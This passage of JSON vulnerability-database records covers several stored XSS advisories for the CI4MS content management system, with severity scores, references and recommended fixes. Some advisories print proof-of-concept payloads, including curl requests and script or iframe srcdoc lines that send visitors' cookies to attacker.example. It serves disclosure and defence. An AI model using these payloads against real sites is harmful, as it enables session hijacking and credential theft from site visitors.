"is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.28.5%252B0" } ], "aliases": [ "CVE-2026-25510", "GHSA-gp56-f67f-m4px" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8j49-k5yj-3kes" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89751?format=api", "vulnerability_id": "VCID-8x3z-1p5j-6qfa", "summary": "CI4MS has stored XSS in Pages Content Due to Missing html_purify Sanitization\n## Summary\n\nThe Pages module does not apply the `html_purify` validation rule to content fields during create and update operations, while the Blog module does. Page content is stored unsanitized in the database and rendered as raw HTML on the public frontend via `echo $pageInfo->content`. An authenticated admin with page-editing privileges can inject arbitrary JavaScript that executes in the browser of every public visitor viewing the page.\n\n## Details\n\nThe Blog module correctly applies HTMLPurifier sanitization to content fields:\n\n**`modules/Blog/Controllers/Blog.php:82`**\n```php\n'lang.*.content' => ['label' => lang('Backend.content'), 'rules' => 'required|html_purify'],\n```\n\nThe Pages module omits this rule in both create and update methods:\n\n**`modules/Pages/Controllers/Pages.php:82`** (create)\n```php\n'lang.*.content' => ['label' => lang('Backend.content'), 'rules' => 'required'],\n```\n\n**`modules/Pages/Controllers/Pages.php:130`** (update)\n```php\n'lang.*.content' => ['label' => lang('Backend.content'), 'rules' => 'required'],\n```\n\nContent is stored directly without sanitization:\n\n**`modules/Pages/Controllers/Pages.php:111`** (create path)\n```php\n'content' => $lData['content'],\n```\n\n**`modules/Pages/Controllers/Pages.php:157`** (update path)\n```php\n'content' => $lData['content'],\n```\n\nOn the public frontend, the content is rendered as raw HTML without escaping:\n\n**`app/Views/templates/default/pages.php:32`**\n```php\n<?php echo $pageInfo->content ?>\n```\n\nNote that the same template correctly escapes the title field on line 9 using `esc($pageInfo->title)`, further confirming the content output is an oversight.\n\nThe `html_purify` custom validation rule is defined in `modules/Backend/Validation/CustomRules.php:54-73` and uses the HTMLPurifier library to strip dangerous HTML (script tags, event handlers) while preserving safe rich content. Its absence from the Pages validation is the root cause.\n\n## PoC\n\n**Step 1: Create a page with XSS payload (requires admin session)**\n```bash\ncurl -X POST https://target/backend/pages/create \\\n -b 'ci_session=ADMIN_SESSION_COOKIE' \\\n -H 'Content-Type: application/x-www-form-urlencoded' \\\n -d 'lang[tr][title]=Test+Page&lang[tr][seflink]=test-xss-page&lang[tr][content]=<p>Normal+content</p><script>document.location=\"https://attacker.example/?c=\"%2Bdocument.cookie</script>&isActive=1'\n```\n\n**Step 2: Visit the page as any unauthenticated user**\n```\nhttps://target/tr/test-xss-page\n```\n\n**Expected result:** The `<script>` tag executes in the visitor's browser, sending their cookies to the attacker-controlled server.\n\n## Impact\n\n- **Session hijacking:** Attacker steals session cookies of any visitor, including other administrators\n- **Credential theft:** Injected JavaScript can render fake login forms or keylog credentials\n- **Site defacement:** Arbitrary HTML/JS can modify the public-facing page for all visitors\n- **Malware distribution:** Injected scripts can redirect visitors or load external payloads\n\nThe attack requires admin-level authentication (PR:H), but the impact crosses the security boundary to affect all unauthenticated public visitors (S:C). In a multi-admin CMS environment, a lower-privileged admin with only page-editing permissions could compromise higher-privileged admin sessions.\n\n## Recommended Fix\n\nAdd the `html_purify` validation rule to both the create and update methods in the Pages controller, consistent with the Blog module:\n\n**`modules/Pages/Controllers/Pages.php:82`** — change:\n```php\n'lang.*.content' => ['label' => lang('Backend.content'), 'rules' => 'required'],\n```\nto:\n```php\n'lang.*.content' => ['label' => lang('Backend.content'), 'rules' => 'required|html_purify'],\n```\n\n**`modules/Pages/Controllers/Pages.php:130`** — apply the same change:\n```php\n'lang.*.content' => ['label' => lang('Backend.content'), 'rules' => 'required|html_purify'],\n```\n\nAdditionally, as defense-in-depth, escape content output in the view template or use the existing `esc()` helper with the `'raw'` context for trusted HTML, ensuring HTMLPurifier has already processed it before storage.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39392", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02483", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02498", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02555", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02552", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39392" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-fjpj-6qcq-6pw2", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T16:05:19Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-fjpj-6qcq-6pw2" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39392", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39392" }, { "reference_url": "https://github.com/advisories/GHSA-fjpj-6qcq-6pw2", "reference_id": "GHSA-fjpj-6qcq-6pw2", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fjpj-6qcq-6pw2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1015581?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.4.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-cd9w-5f22-xkfk" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-j32w-tcpz-1fak" }, { "vulnerability": "VCID-mds3-7xh3-mkgv" }, { "vulnerability": "VCID-qrag-mndk-xbb7" }, { "vulnerability": "VCID-ux28-acyz-kqd1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.4.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/110229?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.4%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.4%252B0" } ], "aliases": [ "CVE-2026-39392", "GHSA-fjpj-6qcq-6pw2" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8x3z-1p5j-6qfa" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89495?format=api", "vulnerability_id": "VCID-9ja8-6jec-nqg3", "summary": "CI4MS: System Settings (Social Media Management) Full Platform Compromise & Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary\n### **Vulnerability: Stored DOM XSS via System Settings – Social Media Management (Same-Page Attribute Breakout & Persistent Payload Injection)**\n- Stored Cross-site Scripting via Unsanitized Social Media Configuration Fields with Immediate Same-Page Execution\n\n### Description\nThe application fails to properly sanitize user-controlled input within **System Settings – Social Media Management**. Multiple configuration fields, including **Social Media** and **Social Media Link**, accept attacker-controlled input that is stored server-side and later rendered without proper output encoding.\n\nUnlike typical stored XSS that executes on other pages (such as public-facing landing pages), this vulnerability executes directly on the same settings page. The injected payload breaks out of the input attribute context and is immediately interpreted by the browser, resulting in same-page DOM-based XSS.\n\nThis represents a different functionality and a separate vulnerability class from public-facing landing page injection.\n\n### Affected Functionality\n- System Settings – Social Media Management configuration\n- Same-page rendering of user-controlled input fields\n- DOM attribute injection within form inputs\n- Storage and retrieval of social media configuration values\n\n### Attack Scenario\n- An attacker injects a malicious JavaScript payload into one or more Social Media Management fields.\n- The payload breaks out of the HTML attribute context.\n- The application stores and re-renders the payload without sanitization or encoding.\n- The payload executes immediately on the same settings page when rendered.\n- The script executes in the browser context of the authenticated user managing settings.\n\n### Impact\n- Persistent Stored XSS\n- Immediate Same-Page DOM XSS execution\n- Execution of arbitrary JavaScript in victims’ browsers\n- Administrative privilege escalation\n- Full administrator account takeover\n- Full account takeover across all roles\n- Full compromise of the entire platform\n\nEndpoints:\n- `/backend/settings/` (Social Media Management)\n\n## Steps To Reproduce (POC)\n1. Navigate to System Settings -> Social Media Management\n2. Insert the following XSS payload into any Social Media or Social Media Link field:\n`test\"><img src=1 onerror=alert()>\" class=\"form-control\" placeholder=\"Name\" required>`\n3. Save the settings\n4. Observe that the payload breaks out of the input attribute context\n5. The XSS executes immediately on the same page\n\n## Remediation\n\n- **Avoid unsafe DOM manipulation methods:** Do not use `.html()`, `innerHTML`, or similar sink functions in client-side JavaScript or server-side templating (e.g., PHP). Even when user input flowing into these sinks is not immediately apparent, they can introduce Cross-Site Scripting (XSS) vulnerabilities that an attacker may exploit.\n\n- **Apply output encoding:** Implement HTML entity encoding on all user-controlled data before rendering it in the browser. This helps neutralize potentially malicious input.\n\n- **Implement input sanitization:** Ensure that all user-supplied input is properly sanitized before processing or output. Currently, no sanitization mechanisms are in place, which should be addressed as a priority.\n\n- **Enforce security headers and cookie attributes:**\n - **Content Security Policy (CSP):** Define and enforce a strict CSP to limit the execution of unauthorized scripts.\n - **HttpOnly flag:** Set the `HttpOnly` attribute on session cookies to prevent client-side script access.\n - **SameSite attribute:** Configure the `SameSite` cookie attribute to mitigate Cross-Site Request Forgery (CSRF) risks.\n - **Secure flag:** Ensure all cookies are transmitted only over HTTPS by enabling the `Secure` attribute.\n\n These measures collectively reduce the impact of XSS and help prevent escalation paths such as CSRF via XSS.\n\n# Ready Video POC:\nhttps://mega.nz/file/PBEFBCpJ#rGGxjnPN38qDtmJssAgIoLuStBcQaZFpR0J1bKAXApc", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34561", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00069", "scoring_system": "epss", "scoring_elements": "0.21471", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00069", "scoring_system": "epss", "scoring_elements": "0.21518", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00069", "scoring_system": "epss", "scoring_elements": "0.21531", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.0008", "scoring_system": "epss", "scoring_elements": "0.23672", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34561" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-gcfj-cf7j-vwgj", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-gcfj-cf7j-vwgj" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34561", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34561" }, { "reference_url": "https://github.com/advisories/GHSA-gcfj-cf7j-vwgj", "reference_id": "GHSA-gcfj-cf7j-vwgj", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gcfj-cf7j-vwgj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1126144?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2v9s-x9dt-8ugb" }, { "vulnerability": "VCID-6nzs-j8gz-9ucu" }, { "vulnerability": "VCID-8x3z-1p5j-6qfa" }, { "vulnerability": "VCID-c1ux-y4qk-xfch" }, { "vulnerability": "VCID-e9xp-rar3-c7bp" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-j32w-tcpz-1fak" }, { "vulnerability": "VCID-mds3-7xh3-mkgv" }, { "vulnerability": "VCID-p1q2-w18a-3kae" }, { "vulnerability": "VCID-qrag-mndk-xbb7" }, { "vulnerability": "VCID-ux28-acyz-kqd1" }, { "vulnerability": "VCID-w12h-33nr-bufh" }, { "vulnerability": "VCID-ye3h-3tu7-p3e7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0" } ], "aliases": [ "CVE-2026-34561", "GHSA-gcfj-cf7j-vwgj" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9ja8-6jec-nqg3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89480?format=api", "vulnerability_id": "VCID-avc6-vkdy-kbgb", "summary": "CI4MS: Blogs Categories Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary\n### **Vulnerability: Stored DOM XSS via Blog Category Title (Persistent Payload Injection)**\n- Stored Cross-Site Scripting via Unsanitized Blog Category Title in Blog Management\n\n### Description\nThe application fails to properly sanitize user-controlled input when creating or editing blog categories. An attacker can inject a malicious JavaScript payload into the category title field, which is then stored server-side.\n\nThis stored payload is later rendered unsafely across public-facing blog category pages, administrative interfaces, and blog post views without proper output encoding, leading to stored cross-site scripting (XSS).\n\n### Affected Functionality\n- Blog category creation functionality\n- Blog category editing functionality\n- Blog category storage and retrieval logic\n\n### Attack Scenario\n- An attacker creates or edits a blog category title to include a malicious XSS payload.\n- The application stores this value without sanitization or encoding.\n- The payload persists and executes whenever the category title is rendered in affected views.\n\n### Impact\n- Persistent Stored XSS\n- Execution of arbitrary JavaScript in victims’ browsers\n- Privilege escalation when viewed by administrators or privileged users\n- Full administrator account takeover\n- Full account takeover across all roles\n- Full compromise of the entire application\n\nEndpoints:\n- `/backend/blogs/categories/`\n- `/blog/{id}`\n\n## Steps To Reproduce (POC)\n1. Go to the Blog Categories management page\n2. Create or edit a category and insert an XSS payload into the category title such as:\n`<img src=x onerror=alert(document.domain)>`\n3. Save the category\n4. View a public blog category page, blog post page, or the administrative interface\n5. Notice the XSS payload executing automatically\n\n## Remediation\n\n- **Avoid unsafe DOM manipulation methods:** Do not use `.html()`, `innerHTML`, or similar sink functions in client-side JavaScript or server-side templating (e.g., PHP). Even when user input flowing into these sinks is not immediately apparent, they can introduce Cross-Site Scripting (XSS) vulnerabilities that an attacker may exploit.\n\n- **Apply output encoding:** Implement HTML entity encoding on all user-controlled data before rendering it in the browser. This helps neutralize potentially malicious input.\n\n- **Implement input sanitization:** Ensure that all user-supplied input is properly sanitized before processing or output. Currently, no sanitization mechanisms are in place, which should be addressed as a priority.\n\n- **Enforce security headers and cookie attributes:**\n - **Content Security Policy (CSP):** Define and enforce a strict CSP to limit the execution of unauthorized scripts.\n - **HttpOnly flag:** Set the `HttpOnly` attribute on session cookies to prevent client-side script access.\n - **SameSite attribute:** Configure the `SameSite` cookie attribute to mitigate Cross-Site Request Forgery (CSRF) risks.\n - **Secure flag:** Ensure all cookies are transmitted only over HTTPS by enabling the `Secure` attribute.\n\n These measures collectively reduce the impact of XSS and help prevent escalation paths such as CSRF via XSS.\n\n# Ready Video POC:\nhttps://mega.nz/file/GAFC3AJY#3LHyuyl7I7921UEeA-JlUYdckh6zGLCTy-6w9BNzSmQ", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34569", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15872", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15912", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15923", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18292", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34569" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T18:04:54Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-fhrf-q333-82fm", "reference_id": "", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T18:04:54Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-fhrf-q333-82fm" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34569", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34569" }, { "reference_url": "https://github.com/advisories/GHSA-fhrf-q333-82fm", "reference_id": "GHSA-fhrf-q333-82fm", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fhrf-q333-82fm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2v9s-x9dt-8ugb" }, { "vulnerability": "VCID-6nzs-j8gz-9ucu" }, { "vulnerability": "VCID-8x3z-1p5j-6qfa" }, { "vulnerability": "VCID-c1ux-y4qk-xfch" }, { "vulnerability": "VCID-e9xp-rar3-c7bp" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-j32w-tcpz-1fak" }, { "vulnerability": "VCID-mds3-7xh3-mkgv" }, { "vulnerability": "VCID-p1q2-w18a-3kae" }, { "vulnerability": "VCID-qrag-mndk-xbb7" }, { "vulnerability": "VCID-ux28-acyz-kqd1" }, { "vulnerability": "VCID-w12h-33nr-bufh" }, { "vulnerability": "VCID-ye3h-3tu7-p3e7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0" } ], "aliases": [ "CVE-2026-34569", "GHSA-fhrf-q333-82fm" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-avc6-vkdy-kbgb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90091?format=api", "vulnerability_id": "VCID-c1ux-y4qk-xfch", "summary": "CI4MS has stored XSS via srcdoc attribute bypass in Google Maps iframe setting\n## Summary\n\nThe Google Maps iframe setting (`cMap` field) in `compInfosPost()` sanitizes input using `strip_tags()` with an `<iframe>` allowlist and regex-based removal of `on\\w+` event handlers. However, the `srcdoc` attribute is not an event handler and passes all filters. An attacker with admin settings access can inject an `<iframe srcdoc=\"...\">` payload with HTML-entity-encoded JavaScript that executes in the context of the parent page when rendered to unauthenticated frontend visitors.\n\n## Details\n\n**Input sanitization** (`modules/Settings/Controllers/Settings.php:49-53`):\n\n```php\n$mapValue = trim(strip_tags($this->request->getPost('cMap'), '<iframe>'));\n$mapValue = preg_replace('/\\bon\\w+\\s*=\\s*\"[^\"]*\"/i', '', $mapValue);\n$mapValue = preg_replace('/\\bon\\w+\\s*=\\s*\\'[^\\']*\\'/i', '', $mapValue);\n$mapValue = preg_replace('/\\bon\\w+\\s*=\\s*[^\\s>]+/i', '', $mapValue);\nsetting()->set('Gmap.map_iframe', $mapValue);\n```\n\nThe three regex patterns only match attributes beginning with `on` (e.g., `onclick`, `onerror`). The `srcdoc` attribute does not begin with `on` and passes through untouched.\n\n**Output rendering** (`app/Views/templates/default/gmapiframe.php:3`):\n\n```php\n<?php echo strip_tags($settings->map_iframe,'<iframe>') ?>\n```\n\nThe output applies `strip_tags` with the same `<iframe>` allowlist but performs no attribute filtering or HTML encoding. The stored payload is rendered verbatim.\n\n**Why HTML entities bypass `strip_tags`**: A payload like `<iframe srcdoc=\"<script>alert(1)</script>\">` contains only one tag (`<iframe>`), which is in the allowlist. The entity-encoded content (`<script>`) is not recognized as a tag by `strip_tags`. However, when the browser renders the `srcdoc` attribute, it decodes the HTML entities and creates a new browsing context containing `<script>alert(1)</script>`.\n\n**Why this is same-origin**: Per the HTML specification, an `<iframe srcdoc=\"...\">` without a `sandbox` attribute inherits the parent document's origin. The injected script has full access to the parent page's cookies, DOM, and session.\n\n## PoC\n\n**Prerequisites**: Authenticated admin session with `update` role on the Settings module.\n\n**Step 1: Inject the payload**\n\n```bash\ncurl -X POST 'https://target/backend/settings/compInfos' \\\n -H 'Cookie: ci_session=ADMIN_SESSION_ID' \\\n -d 'cName=TestCo&cAddress=123+Main+St&cPhone=1234567890&cMail=admin@example.com&cMap=%3Ciframe+srcdoc%3D%22%26lt%3Bscript%26gt%3Balert(document.domain)%26lt%3B%2Fscript%26gt%3B%22%3E%3C%2Fiframe%3E'\n```\n\nThe `cMap` value decodes to:\n```html\n<iframe srcdoc=\"<script>alert(document.domain)</script>\"></iframe>\n```\n\n**Step 2: Visit any public page that includes the Google Maps widget**\n\nNavigate to the frontend contact or footer page as an unauthenticated visitor. The browser renders the `srcdoc` iframe, decodes the entities, and executes the script in the parent page's origin.\n\n**Expected result**: JavaScript `alert(document.domain)` fires showing the target's domain, confirming same-origin execution.\n\n**Cookie theft variant**:\n```\n<iframe srcdoc=\"<script>document.location='https://attacker.example/steal?c='+document.cookie</script>\"></iframe>\n```\n\n## Impact\n\n- **Stored XSS affecting all frontend visitors**: The payload persists in the settings database and executes for every unauthenticated visitor viewing pages that include the Google Maps iframe widget.\n- **Session hijacking**: The script executes in the parent page's origin, giving access to session cookies (unless HttpOnly is set) and the full DOM.\n- **Credential theft**: An attacker can inject a fake login form or redirect users to a phishing page.\n- **Scope change**: The attack crosses from the admin backend trust boundary to the public frontend, affecting users who have no relationship with the backend.\n\nThe attack requires a compromised or malicious admin account with settings update permission. While this is a privileged starting point (PR:H), the impact crosses to all unauthenticated visitors (S:C), justifying Medium severity.\n\n## Recommended Fix\n\nReplace the regex-based attribute blocklist with a strict allowlist approach. Only allow `src`, `width`, `height`, `frameborder`, `style`, `allowfullscreen`, and `loading` attributes on iframe tags:\n\n```php\n// In modules/Settings/Controllers/Settings.php, replace lines 49-52:\n$mapValue = trim(strip_tags($this->request->getPost('cMap'), '<iframe>'));\n// Strip all attributes except safe ones for iframes\n$mapValue = preg_replace_callback(\n '/<iframe\\s+([^>]*)>/i',\n function ($matches) {\n $allowedAttrs = ['src', 'width', 'height', 'frameborder', 'style', 'allowfullscreen', 'loading', 'title'];\n preg_match_all('/(\\w+)\\s*=\\s*(?:\"([^\"]*)\"|\\'([^\\']*)\\'|(\\S+))/i', $matches[1], $attrs, PREG_SET_ORDER);\n $safe = '';\n foreach ($attrs as $attr) {\n $name = strtolower($attr[1]);\n $value = $attr[2] ?: $attr[3] ?: $attr[4];\n if (in_array($name, $allowedAttrs, true)) {\n // For src, only allow https URLs (block javascript: etc.)\n if ($name === 'src' && !preg_match('#^https://#i', $value)) {\n continue;\n }\n $safe .= ' ' . $name . '=\"' . esc($value) . '\"';\n }\n }\n return '<iframe' . $safe . '>';\n },\n $mapValue\n);\n```\n\nThis allowlist approach ensures that dangerous attributes like `srcdoc`, `src` with `javascript:` protocol, and any future dangerous attributes are blocked by default.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39390", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01339", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01337", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01343", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39390" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", 